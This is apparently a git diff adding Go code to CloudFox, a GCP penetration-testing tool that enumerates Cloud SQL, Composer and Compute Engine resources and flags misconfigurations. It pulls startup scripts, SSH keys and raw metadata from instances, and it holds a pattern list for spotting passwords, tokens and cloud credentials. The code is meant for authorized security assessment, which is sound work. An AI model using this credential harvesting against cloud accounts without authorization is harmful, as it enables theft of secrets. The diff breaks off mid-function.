+type CloudSQLService struct{ + session *gcpinternal.SafeSession +} + +func New() *CloudSQLService { + return &CloudSQLService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *CloudSQLService { + return &CloudSQLService{session: session} +} + +// getService returns a SQL Admin service, either cached from the session or a new one +func (cs *CloudSQLService) getService(ctx context.Context) (*sqladmin.Service, error) { + if cs.session != nil { + return sdk.CachedGetSQLAdminService(ctx, cs.session) + } + return sqladmin.NewService(ctx) +} + +// SQLInstanceInfo holds Cloud SQL instance details with security-relevant information +type SQLInstanceInfo struct { + // Basic info + Name string + ProjectID string + Region string + DatabaseVersion string + Tier string + State string + + // Network configuration + PublicIP string + PrivateIP string + 
HasPublicIP bool + AuthorizedNetworks []AuthorizedNetwork + RequireSSL bool + SSLMode string + + // Security configuration + ServiceAccountEmail string + RootPasswordSet bool + PasswordPolicyEnabled bool + IAMAuthentication bool + + // Backup configuration + BackupEnabled bool + BinaryLogEnabled bool + BackupLocation string + PointInTimeRecovery bool + RetentionDays int + + // Encryption + KMSKeyName string + EncryptionType string // Google-managed or CMEK + + // High Availability + AvailabilityType string // REGIONAL or ZONAL + FailoverReplica string + + // Maintenance + MaintenanceWindow string + + // Databases (if enumerated) + Databases []string + + // Security issues detected + SecurityIssues []string +} + +// AuthorizedNetwork represents a network authorized to connect +type AuthorizedNetwork struct { + Name string + Value string // CIDR + IsPublic bool // 0.0.0.0/0 or similar +} + +// Instances retrieves all Cloud SQL instances in a project +func (cs *CloudSQLService) Instances(projectID string) ([]SQLInstanceInfo, error) { + ctx := context.Background() + + service, err := cs.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") + } + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sqladmin.googleapis.com") + } + + var instances []SQLInstanceInfo + for _, instance := range resp.Items { + info := parseInstanceInfo(instance, projectID) + instances = append(instances, info) + } + + return instances, nil +} + +// parseInstanceInfo extracts security-relevant information from a Cloud SQL instance +func parseInstanceInfo(instance *sqladmin.DatabaseInstance, projectID string) SQLInstanceInfo { + info := SQLInstanceInfo{ + Name: instance.Name, + ProjectID: projectID, + DatabaseVersion: instance.DatabaseVersion, + State: instance.State, + SecurityIssues: []string{}, + } + + // Region from GCE zone + if instance.GceZone != "" { + // Zone format: 
us-central1-a -> extract region us-central1
		parts := strings.Split(instance.GceZone, "-")
		if len(parts) >= 2 {
			info.Region = parts[0] + "-" + parts[1]
		}
	} else if instance.Region != "" {
		info.Region = instance.Region
	}

	// Settings
	if instance.Settings != nil {
		info.Tier = instance.Settings.Tier
		info.AvailabilityType = instance.Settings.AvailabilityType

		// BUG FIX: IAM database authentication is controlled by the
		// "cloudsql.iam_authentication" database flag, not by
		// IpConfiguration.EnablePrivatePathForGoogleCloudServices (that field
		// only governs private-path access for Google Cloud services and is
		// unrelated to authentication).
		for _, flag := range instance.Settings.DatabaseFlags {
			if flag != nil && flag.Name == "cloudsql.iam_authentication" && strings.EqualFold(flag.Value, "on") {
				info.IAMAuthentication = true
				break
			}
		}

		// IP configuration
		if instance.Settings.IpConfiguration != nil {
			ipConfig := instance.Settings.IpConfiguration
			info.RequireSSL = ipConfig.RequireSsl
			info.SSLMode = ipConfig.SslMode

			// BUG FIX: Ipv4Enabled is the authoritative public-IP switch.
			// The old logic assumed "no private network => public", which
			// mislabeled instances, and an instance with a private network
			// can ALSO have a public IP — both cases reduce to Ipv4Enabled.
			info.HasPublicIP = ipConfig.Ipv4Enabled

			// Parse authorized networks
			for _, network := range ipConfig.AuthorizedNetworks {
				an := AuthorizedNetwork{
					Name:  network.Name,
					Value: network.Value,
				}
				// Flag CIDRs covering the public internet: 0.0.0.0/0 or the
				// two /1 halves that together cover all of IPv4.
				if network.Value == "0.0.0.0/0" ||
					network.Value == "0.0.0.0/1" ||
					network.Value == "128.0.0.0/1" {
					an.IsPublic = true
				}
				info.AuthorizedNetworks = append(info.AuthorizedNetworks, an)
			}
		}

		// Backup configuration
		if instance.Settings.BackupConfiguration != nil {
			backup := instance.Settings.BackupConfiguration
			info.BackupEnabled = backup.Enabled
			info.BinaryLogEnabled = backup.BinaryLogEnabled
			info.BackupLocation = backup.Location
			info.PointInTimeRecovery = backup.PointInTimeRecoveryEnabled
			info.RetentionDays = int(backup.TransactionLogRetentionDays)
		}

		// Password policy
		if instance.Settings.PasswordValidationPolicy != nil {
			info.PasswordPolicyEnabled = instance.Settings.PasswordValidationPolicy.EnablePasswordPolicy
		}

		// Maintenance window
		if instance.Settings.MaintenanceWindow != nil {
			info.MaintenanceWindow = fmt.Sprintf("Day %d, Hour %d",
				instance.Settings.MaintenanceWindow.Day, 
+ instance.Settings.MaintenanceWindow.Hour) + } + + // Database flags (can reveal security settings) + // These could be parsed for specific security-relevant flags + } + + // IP addresses + for _, ip := range instance.IpAddresses { + switch ip.Type { + case "PRIMARY": + info.PublicIP = ip.IpAddress + case "PRIVATE": + info.PrivateIP = ip.IpAddress + } + } + + // Service account + info.ServiceAccountEmail = instance.ServiceAccountEmailAddress + + // Disk encryption + if instance.DiskEncryptionConfiguration != nil { + info.KMSKeyName = instance.DiskEncryptionConfiguration.KmsKeyName + if info.KMSKeyName != "" { + info.EncryptionType = "CMEK" + } else { + info.EncryptionType = "Google-managed" + } + } else { + info.EncryptionType = "Google-managed" + } + + // Failover replica + if instance.FailoverReplica != nil { + info.FailoverReplica = instance.FailoverReplica.Name + } + + // Identify security issues + info.SecurityIssues = identifySecurityIssues(info) + + return info +} + +// identifySecurityIssues checks for common security misconfigurations +func identifySecurityIssues(instance SQLInstanceInfo) []string { + var issues []string + + // Public IP enabled + if instance.HasPublicIP { + issues = append(issues, "Public IP enabled") + } + + // Public IP without SSL requirement + if instance.HasPublicIP && !instance.RequireSSL { + issues = append(issues, "Public IP without SSL requirement") + } + + // Authorized networks include 0.0.0.0/0 + for _, network := range instance.AuthorizedNetworks { + if network.IsPublic { + issues = append(issues, fmt.Sprintf("Authorized network allows all IPs: %s", network.Value)) + } + } + + // No authorized networks but public IP (potentially open to all) + if instance.HasPublicIP && len(instance.AuthorizedNetworks) == 0 { + issues = append(issues, "Public IP with no authorized networks (blocked by default, but verify)") + } + + // Backups not enabled + if !instance.BackupEnabled { + issues = append(issues, "Automated backups not 
enabled") + } + + // Point-in-time recovery not enabled + if !instance.PointInTimeRecovery && instance.BackupEnabled { + issues = append(issues, "Point-in-time recovery not enabled") + } + + // Using Google-managed encryption (not CMEK) + if instance.EncryptionType == "Google-managed" { + // This is informational, not necessarily an issue + // issues = append(issues, "Using Google-managed encryption (not CMEK)") + } + + // Single zone deployment + if instance.AvailabilityType == "ZONAL" { + issues = append(issues, "Single zone deployment (no HA)") + } + + // Password policy not enabled + if !instance.PasswordPolicyEnabled { + issues = append(issues, "Password validation policy not enabled") + } + + return issues +} diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go new file mode 100644 index 00000000..2ab7ab23 --- /dev/null +++ b/gcp/services/composerService/composerService.go @@ -0,0 +1,205 @@ +package composerservice + +import ( + "context" + "fmt" + "strings" + "sync" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + composer "google.golang.org/api/composer/v1" +) + +type ComposerService struct { + session *gcpinternal.SafeSession +} + +func New() *ComposerService { + return &ComposerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *ComposerService { + return &ComposerService{session: session} +} + +// getService returns a Composer service client using cached session if available +func (s *ComposerService) getService(ctx context.Context) (*composer.Service, error) { + if s.session != nil { + return sdk.CachedGetComposerService(ctx, s.session) + } + return composer.NewService(ctx) +} + +// EnvironmentInfo represents a Cloud Composer environment +type EnvironmentInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + 
Location string `json:"location"` + State string `json:"state"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + + // Airflow config + AirflowURI string `json:"airflowUri"` + DagGcsPrefix string `json:"dagGcsPrefix"` + AirflowVersion string `json:"airflowVersion"` + PythonVersion string `json:"pythonVersion"` + ImageVersion string `json:"imageVersion"` + + // Node config + MachineType string `json:"machineType"` + DiskSizeGb int64 `json:"diskSizeGb"` + NodeCount int64 `json:"nodeCount"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + ServiceAccount string `json:"serviceAccount"` + + // Security config + PrivateEnvironment bool `json:"privateEnvironment"` + WebServerAllowedIPs []string `json:"webServerAllowedIps"` + EnablePrivateEndpoint bool `json:"enablePrivateEndpoint"` +} + +// ListEnvironments retrieves all Composer environments in a project across all regions +// Note: The Cloud Composer API does NOT support the "-" wildcard for locations +// so we must iterate through regions explicitly +func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "composer.googleapis.com") + } + + var environments []EnvironmentInfo + var mu sync.Mutex + var wg sync.WaitGroup + var lastErr error + var errMu sync.Mutex + + // Use a semaphore to limit concurrent API calls + semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + + // Iterate through all Composer regions in parallel + for _, region := range regions { + wg.Add(1) + go func(region string) { + defer wg.Done() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, 
region) + req := service.Projects.Locations.Environments.List(parent) + err := req.Pages(ctx, func(page *composer.ListEnvironmentsResponse) error { + for _, env := range page.Environments { + info := s.parseEnvironment(env, projectID) + mu.Lock() + environments = append(environments, info) + mu.Unlock() + } + return nil + }) + + if err != nil { + // Track the last error but continue - region may not have environments or API may not be enabled + errMu.Lock() + lastErr = err + errMu.Unlock() + } + }(region) + } + + wg.Wait() + + // Only return error if we got no environments AND had errors + // If we found environments in some regions, that's success + if len(environments) == 0 && lastErr != nil { + return nil, gcpinternal.ParseGCPError(lastErr, "composer.googleapis.com") + } + + return environments, nil +} + +// parseEnvironment converts a Composer environment to EnvironmentInfo +func (s *ComposerService) parseEnvironment(env *composer.Environment, projectID string) EnvironmentInfo { + info := EnvironmentInfo{ + Name: extractName(env.Name), + ProjectID: projectID, + Location: extractLocation(env.Name), + State: env.State, + CreateTime: env.CreateTime, + UpdateTime: env.UpdateTime, + } + + if env.Config != nil { + // Airflow config + if env.Config.AirflowUri != "" { + info.AirflowURI = env.Config.AirflowUri + } + info.DagGcsPrefix = env.Config.DagGcsPrefix + + // Software config + if env.Config.SoftwareConfig != nil { + info.ImageVersion = env.Config.SoftwareConfig.ImageVersion + info.PythonVersion = env.Config.SoftwareConfig.PythonVersion + // Extract Airflow version from ImageVersion (format: composer-X.Y.Z-airflow-A.B.C) + if env.Config.SoftwareConfig.ImageVersion != "" { + info.AirflowVersion = env.Config.SoftwareConfig.ImageVersion + } + } + + // Node config + if env.Config.NodeConfig != nil { + info.MachineType = env.Config.NodeConfig.MachineType + info.DiskSizeGb = env.Config.NodeConfig.DiskSizeGb + info.Network = env.Config.NodeConfig.Network + 
info.Subnetwork = env.Config.NodeConfig.Subnetwork + info.ServiceAccount = env.Config.NodeConfig.ServiceAccount + } + + info.NodeCount = env.Config.NodeCount + + // Private environment config + if env.Config.PrivateEnvironmentConfig != nil { + info.PrivateEnvironment = env.Config.PrivateEnvironmentConfig.EnablePrivateEnvironment + // EnablePrivateEndpoint is part of PrivateClusterConfig, not PrivateEnvironmentConfig + if env.Config.PrivateEnvironmentConfig.PrivateClusterConfig != nil { + info.EnablePrivateEndpoint = env.Config.PrivateEnvironmentConfig.PrivateClusterConfig.EnablePrivateEndpoint + } + } + + // Web server network access control + if env.Config.WebServerNetworkAccessControl != nil { + for _, cidr := range env.Config.WebServerNetworkAccessControl.AllowedIpRanges { + info.WebServerAllowedIPs = append(info.WebServerAllowedIPs, cidr.Value) + } + } + } + + return info +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLocation(fullName string) string { + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index bcff7739..a63b3168 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -5,68 +5,279 @@ import ( "fmt" "strings" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/compute/v1" ) type ComputeEngineService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new ComputeEngineService (legacy - uses ADC directly) func New() *ComputeEngineService { return 
&ComputeEngineService{} } +// NewWithSession creates a ComputeEngineService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *ComputeEngineService { + return &ComputeEngineService{session: session} +} + +// ServiceAccountInfo contains service account details for an instance +type ServiceAccountInfo struct { + Email string `json:"email"` + Scopes []string `json:"scopes"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// InstanceType represents the type/manager of an instance +type InstanceType string + +const ( + InstanceTypeStandalone InstanceType = "Standalone" // Regular VM + InstanceTypeGKE InstanceType = "GKE" // GKE node + InstanceTypeMIG InstanceType = "MIG" // Managed Instance Group + InstanceTypeDataproc InstanceType = "Dataproc" // Dataproc cluster node + InstanceTypeDataflow InstanceType = "Dataflow" // Dataflow worker + InstanceTypeComposer InstanceType = "Composer" // Cloud Composer worker + InstanceTypeNotebooks InstanceType = "Notebooks" // Vertex AI Workbench / AI Platform Notebooks + InstanceTypeBatchJob InstanceType = "Batch" // Cloud Batch job + InstanceTypeCloudRun InstanceType = "CloudRun" // Cloud Run (Jobs) execution environment + InstanceTypeFilestore InstanceType = "Filestore" // Filestore instance + InstanceTypeSQLProxy InstanceType = "CloudSQL" // Cloud SQL Proxy + InstanceTypeAppEngine InstanceType = "AppEngine" // App Engine Flex +) + +// ComputeEngineInfo contains instance metadata and security-relevant configuration type ComputeEngineInfo struct { - Name string - ID string - Zone string - State string - ExternalIP string - InternalIP string - ServiceAccounts []*compute.ServiceAccount // Assuming role is derived from service accounts - NetworkInterfaces []*compute.NetworkInterface - Tags *compute.Tags - ProjectID string + // Basic info + Name string `json:"name"` + ID string 
`json:"id"` + Zone string `json:"zone"` + State string `json:"state"` + ProjectID string `json:"projectID"` + InstanceType InstanceType `json:"instanceType"` // Type of instance (GKE, MIG, Dataproc, etc.) + + // Network configuration + ExternalIP string `json:"externalIP"` + InternalIP string `json:"internalIP"` + NetworkInterfaces []*compute.NetworkInterface `json:"networkInterfaces"` + CanIPForward bool `json:"canIpForward"` // Can forward packets (router/NAT) + + // Service accounts and scopes + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + HasDefaultSA bool `json:"hasDefaultSA"` // Uses default compute SA + HasCloudScopes bool `json:"hasCloudScopes"` // Has cloud-platform or other broad scopes + + // Security configuration + DeletionProtection bool `json:"deletionProtection"` // Protected against deletion + ShieldedVM bool `json:"shieldedVM"` // Shielded VM enabled + SecureBoot bool `json:"secureBoot"` // Secure Boot enabled + VTPMEnabled bool `json:"vtpmEnabled"` // vTPM enabled + IntegrityMonitoring bool `json:"integrityMonitoring"` // Integrity monitoring enabled + ConfidentialVM bool `json:"confidentialVM"` // Confidential computing enabled + + // Instance metadata + MachineType string `json:"machineType"` + Tags *compute.Tags `json:"tags"` + Labels map[string]string `json:"labels"` + + // Metadata security + HasStartupScript bool `json:"hasStartupScript"` // Has startup script in metadata + HasSSHKeys bool `json:"hasSSHKeys"` // Has SSH keys in metadata + BlockProjectSSHKeys bool `json:"blockProjectSSHKeys"` // Blocks project-wide SSH keys + OSLoginEnabled bool `json:"osLoginEnabled"` // OS Login enabled + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` // OS Login 2FA enabled + SerialPortEnabled bool `json:"serialPortEnabled"` // Serial port access enabled + + // Pentest-specific fields: actual content extraction + StartupScriptContent string `json:"startupScriptContent"` // Actual startup script content + StartupScriptURL string 
`json:"startupScriptURL"` // URL to startup script if remote + SSHKeys []string `json:"sshKeys"` // Extracted SSH keys + CustomMetadata []string `json:"customMetadata"` // Other custom metadata keys + RawMetadata map[string]string `json:"rawMetadata"` // Full raw metadata key-value pairs + SensitiveMetadata []SensitiveItem `json:"sensitiveMetadata"` // Detected sensitive items in metadata + + // Disk encryption + BootDiskEncryption string `json:"bootDiskEncryption"` // "Google-managed", "CMEK", or "CSEK" + BootDiskKMSKey string `json:"bootDiskKMSKey"` // KMS key for CMEK + + // Timestamps + CreationTimestamp string `json:"creationTimestamp"` + LastStartTimestamp string `json:"lastStartTimestamp"` + LastSnapshotDate string `json:"lastSnapshotDate"` // Most recent snapshot date for any attached disk + + // IAM bindings + IAMBindings []IAMBinding `json:"iamBindings"` } -// Retrieves instances from all regions and zones for a project without using concurrency. -func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInfo, error) { +// ProjectMetadataInfo contains project-level metadata security info +type ProjectMetadataInfo struct { + ProjectID string `json:"projectId"` + HasProjectSSHKeys bool `json:"hasProjectSSHKeys"` + ProjectSSHKeys []string `json:"projectSSHKeys"` + HasProjectStartupScript bool `json:"hasProjectStartupScript"` + ProjectStartupScript string `json:"projectStartupScript"` + OSLoginEnabled bool `json:"osLoginEnabled"` + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` + SerialPortEnabled bool `json:"serialPortEnabled"` + CustomMetadataKeys []string `json:"customMetadataKeys"` + RawMetadata map[string]string `json:"rawMetadata"` + SensitiveMetadata []SensitiveItem `json:"sensitiveMetadata"` +} + +// InstanceIAMInfo contains IAM policy info for an instance +type InstanceIAMInfo struct { + InstanceName string `json:"instanceName"` + Zone string `json:"zone"` + ProjectID string `json:"projectId"` + ComputeAdmins []string 
`json:"computeAdmins"` // compute.admin or owner + InstanceAdmins []string `json:"instanceAdmins"` // compute.instanceAdmin + SSHUsers []string `json:"sshUsers"` // compute.osLogin or osAdminLogin + MetadataSetters []string `json:"metadataSetters"` // compute.instances.setMetadata +} + +// getService returns a compute service, using session if available +func (ces *ComputeEngineService) getService(ctx context.Context) (*compute.Service, error) { + if ces.session != nil { + return sdk.CachedGetComputeService(ctx, ces.session) + } + return compute.NewService(ctx) +} + +// getInstanceIAMBindings retrieves all IAM bindings for an instance +func (ces *ComputeEngineService) getInstanceIAMBindings(service *compute.Service, projectID, zone, instanceName string) []IAMBinding { ctx := context.Background() - computeService, err := compute.NewService(ctx) + + policy, err := service.Instances.GetIamPolicy(projectID, zone, instanceName).Context(ctx).Do() if err != nil { - return nil, err + return nil } - regions, err := computeService.Regions.List(projectID).Do() + var bindings []IAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +// Retrieves instances from all regions and zones for a project without using concurrency. 
+func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInfo, error) { + ctx := context.Background() + computeService, err := ces.getService(ctx) if err != nil { - return nil, err + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } + // Use AggregatedList to get all instances across all zones in one call + // This only requires compute.instances.list permission (not compute.regions.list) var instanceInfos []ComputeEngineInfo - for _, region := range regions.Items { - for _, zoneURL := range region.Zones { - zone := getZoneNameFromURL(zoneURL) - instanceList, err := computeService.Instances.List(projectID, zone).Do() - if err != nil { - return nil, fmt.Errorf("error retrieving instances from zone %s: %v", zone, err) - } - for _, instance := range instanceList.Items { + + req := computeService.Instances.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.Instances == nil { + continue + } + // Extract zone from scope name (format: "zones/us-central1-a") + zone := "" + if strings.HasPrefix(scopeName, "zones/") { + zone = strings.TrimPrefix(scopeName, "zones/") + } + + for _, instance := range scopedList.Instances { info := ComputeEngineInfo{ - Name: instance.Name, - ID: fmt.Sprintf("%v", instance.Id), - Zone: zoneURL, - State: instance.Status, - ExternalIP: getExternalIP(instance), - InternalIP: getInternalIP(instance), - ServiceAccounts: instance.ServiceAccounts, - NetworkInterfaces: instance.NetworkInterfaces, - Tags: instance.Tags, - ProjectID: projectID, + Name: instance.Name, + ID: fmt.Sprintf("%v", instance.Id), + Zone: zone, + State: instance.Status, + InstanceType: detectInstanceType(instance), + ExternalIP: getExternalIP(instance), + InternalIP: getInternalIP(instance), + NetworkInterfaces: instance.NetworkInterfaces, + CanIPForward: instance.CanIpForward, + Tags: instance.Tags, + Labels: instance.Labels, 
+ ProjectID: projectID, + DeletionProtection: instance.DeletionProtection, + CreationTimestamp: instance.CreationTimestamp, + LastStartTimestamp: instance.LastStartTimestamp, + } + + // Parse machine type (extract just the type name) + info.MachineType = getMachineTypeName(instance.MachineType) + + // Parse service accounts and scopes + info.ServiceAccounts, info.HasDefaultSA, info.HasCloudScopes = parseServiceAccounts(instance.ServiceAccounts, projectID) + + // Parse shielded VM config + if instance.ShieldedInstanceConfig != nil { + info.ShieldedVM = true + info.SecureBoot = instance.ShieldedInstanceConfig.EnableSecureBoot + info.VTPMEnabled = instance.ShieldedInstanceConfig.EnableVtpm + info.IntegrityMonitoring = instance.ShieldedInstanceConfig.EnableIntegrityMonitoring } + + // Parse confidential VM config + if instance.ConfidentialInstanceConfig != nil { + info.ConfidentialVM = instance.ConfidentialInstanceConfig.EnableConfidentialCompute + } + + // Parse metadata for security-relevant items including content + if instance.Metadata != nil { + metaResult := parseMetadataFull(instance.Metadata) + info.HasStartupScript = metaResult.HasStartupScript + info.HasSSHKeys = metaResult.HasSSHKeys + info.BlockProjectSSHKeys = metaResult.BlockProjectSSHKeys + info.OSLoginEnabled = metaResult.OSLoginEnabled + info.OSLogin2FAEnabled = metaResult.OSLogin2FA + info.SerialPortEnabled = metaResult.SerialPortEnabled + info.StartupScriptContent = metaResult.StartupScriptContent + info.StartupScriptURL = metaResult.StartupScriptURL + info.SSHKeys = metaResult.SSHKeys + info.CustomMetadata = metaResult.CustomMetadata + info.RawMetadata = metaResult.RawMetadata + // Mark source for sensitive items + for i := range metaResult.SensitiveItems { + metaResult.SensitiveItems[i].Source = "instance" + } + info.SensitiveMetadata = metaResult.SensitiveItems + } + + // Parse boot disk encryption + info.BootDiskEncryption, info.BootDiskKMSKey = parseBootDiskEncryption(instance.Disks) + + // Get 
last snapshot date for this instance's disks + info.LastSnapshotDate = ces.getLastSnapshotForDisks(computeService, projectID, instance.Disks) + + // Fetch IAM bindings for this instance (may fail silently if no permission) + info.IAMBindings = ces.getInstanceIAMBindings(computeService, projectID, zone, instance.Name) + instanceInfos = append(instanceInfos, info) } } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } + return instanceInfos, nil } @@ -96,4 +307,753 @@ func getInternalIP(instance *compute.Instance) string { return "" } -// TODO consider just getting the emails of the service account and returning a []string +// getMachineTypeName extracts the machine type name from a full URL +func getMachineTypeName(machineTypeURL string) string { + parts := strings.Split(machineTypeURL, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return machineTypeURL +} + +// parseServiceAccounts extracts service account info and checks for security concerns +func parseServiceAccounts(sas []*compute.ServiceAccount, projectID string) ([]ServiceAccountInfo, bool, bool) { + var accounts []ServiceAccountInfo + hasDefaultSA := false + hasCloudScopes := false + + defaultSAPattern := fmt.Sprintf("%s-compute@developer.gserviceaccount.com", projectID) + + for _, sa := range sas { + info := ServiceAccountInfo{ + Email: sa.Email, + Scopes: sa.Scopes, + } + accounts = append(accounts, info) + + // Check if using default compute service account + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") || + strings.HasSuffix(sa.Email, defaultSAPattern) { + hasDefaultSA = true + } + + // Check for broad scopes + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" || + scope == "https://www.googleapis.com/auth/compute" || + scope == "https://www.googleapis.com/auth/devstorage.full_control" || + scope == "https://www.googleapis.com/auth/devstorage.read_write" { 
				hasCloudScopes = true
			}
		}
	}

	return accounts, hasDefaultSA, hasCloudScopes
}

// SensitiveItem represents a potentially sensitive metadata item
type SensitiveItem struct {
	Key         string `json:"key"`
	Value       string `json:"value"`
	Type        string `json:"type"`        // password, api-key, token, credential, connection-string, secret, env-var
	Source      string `json:"source"`      // instance, project, or specific like "instance:user-data"
	MetadataKey string `json:"metadataKey"` // The metadata key where this was found (e.g., user-data, startup-script)
}

// MetadataParseResult contains all parsed metadata fields
type MetadataParseResult struct {
	HasStartupScript     bool
	HasSSHKeys           bool
	BlockProjectSSHKeys  bool
	OSLoginEnabled       bool
	OSLogin2FA           bool
	SerialPortEnabled    bool
	StartupScriptContent string
	StartupScriptURL     string
	SSHKeys              []string
	CustomMetadata       []string // custom (non-system) metadata key names
	RawMetadata          map[string]string
	SensitiveItems       []SensitiveItem
}

// parseMetadata checks instance metadata for security-relevant settings.
// It is a thin wrapper over parseMetadataFull that discards the content fields
// and returns only the boolean flags.
func parseMetadata(metadata *compute.Metadata) (hasStartupScript, hasSSHKeys, blockProjectSSHKeys, osLoginEnabled, osLogin2FA, serialPortEnabled bool) {
	result := parseMetadataFull(metadata)
	return result.HasStartupScript, result.HasSSHKeys, result.BlockProjectSSHKeys,
		result.OSLoginEnabled, result.OSLogin2FA, result.SerialPortEnabled
}

// sensitivePatterns maps key name patterns to secret types
// These are checked with contains matching, so they should be specific enough to avoid false positives
var sensitivePatterns = map[string]string{
	// Passwords - high confidence patterns that end with PASSWORD/PASSWD/PWD
	"_PASSWORD": "password",
	"_PASSWD":   "password",
	"_PWD":      "password",
	"_PASS":     "password",

	// Secrets - patterns that explicitly contain SECRET
	"_SECRET":    "secret",
	"SECRET_KEY": "secret",
	"APP_SECRET": "secret",
	"JWT_SECRET": "secret",

	// API Keys - explicit API key patterns
	"API_KEY":    "api-key",
	"APIKEY":     "api-key",
	"_APIKEY":    "api-key",
	"API_SECRET": "api-key",

	// Tokens - explicit token patterns (must have _TOKEN suffix or TOKEN_ prefix to be specific)
	"_TOKEN":       "token",
	"TOKEN_":       "token",
	"ACCESS_TOKEN": "token",
	"AUTH_TOKEN":   "token",
	"BEARER_":      "token",

	// Private keys
	"PRIVATE_KEY": "credential",
	"PRIVATEKEY":  "credential",
	"_PRIVKEY":    "credential",

	// Connection strings - explicit patterns
	"CONNECTION_STRING": "connection-string",
	"DATABASE_URL":      "connection-string",
	"MONGODB_URI":       "connection-string",
	"_CONN_STR":         "connection-string",

	// Cloud provider credentials - very specific patterns
	"AWS_SECRET_ACCESS_KEY": "credential",
	"AWS_SESSION_TOKEN":     "credential",
	"AZURE_CLIENT_SECRET":   "credential",
	"GOOGLE_CREDENTIALS":    "credential",

	// OAuth - specific patterns
	"CLIENT_SECRET":   "credential",
	"CONSUMER_SECRET": "credential",
	"OAUTH_SECRET":    "credential",
}

// detectSensitiveType checks if a key name matches sensitive patterns.
// Returns the secret type (e.g. "password", "token") or "" when no pattern matches.
// Matching is case-insensitive substring matching against sensitivePatterns.
func detectSensitiveType(key string) string {
	keyUpper := strings.ToUpper(key)
	for pattern, secretType := range sensitivePatterns {
		if strings.Contains(keyUpper, pattern) {
			return secretType
		}
	}
	return ""
}

// parseMetadataFull extracts all metadata including content.
// It records raw key/value pairs, flags security-relevant system keys
// (startup scripts, SSH keys, OS Login, serial port), and scans both key
// names and values for sensitive material.
func parseMetadataFull(metadata *compute.Metadata) MetadataParseResult {
	result := MetadataParseResult{
		RawMetadata: make(map[string]string),
	}
	if metadata == nil || metadata.Items == nil {
		return result
	}

	// Known metadata keys to exclude from custom metadata
	knownKeys := map[string]bool{
		"startup-script":                true,
		"startup-script-url":            true,
		"ssh-keys":                      true,
		"sshKeys":                       true,
		"block-project-ssh-keys":        true,
		"enable-oslogin":                true,
		"enable-oslogin-2fa":            true,
		"serial-port-enable":            true,
		"google-compute-default-zone":   true,
		"google-compute-default-region": true,
	}

	for _, item := range metadata.Items {
		if item == nil {
			continue
		}

		// Store all raw metadata (except ssh-keys which go to separate loot)
		if item.Value != nil && item.Key != "ssh-keys" && item.Key != "sshKeys" {
			result.RawMetadata[item.Key] = *item.Value
		}

		// Check ALL metadata keys for sensitive patterns (not just custom ones)
		if item.Value != nil {
			if sensitiveType := detectSensitiveType(item.Key); sensitiveType != "" {
				// NOTE(review): Source is left unset here (instance-level callers
				// appear to rely on the zero value) — confirm against callers.
				result.SensitiveItems = append(result.SensitiveItems, SensitiveItem{
					Key:         item.Key,
					Value:       *item.Value,
					Type:        sensitiveType,
					MetadataKey: item.Key, // The key itself is the metadata key
				})
			}
			// Also scan metadata VALUES for embedded env vars (e.g., VAR=value patterns)
			valueItems := extractSensitiveFromScript(*item.Value, "metadata-value:"+item.Key)
			result.SensitiveItems = append(result.SensitiveItems, valueItems...)
		}

		switch item.Key {
		case "startup-script":
			result.HasStartupScript = true
			if item.Value != nil {
				result.StartupScriptContent = *item.Value
				// Check startup script for sensitive patterns (env vars inside script)
				sensitiveItems := extractSensitiveFromScript(*item.Value, "startup-script")
				result.SensitiveItems = append(result.SensitiveItems, sensitiveItems...)
			}
		case "startup-script-url":
			result.HasStartupScript = true
			if item.Value != nil {
				result.StartupScriptURL = *item.Value
			}
		case "ssh-keys", "sshKeys":
			result.HasSSHKeys = true
			if item.Value != nil {
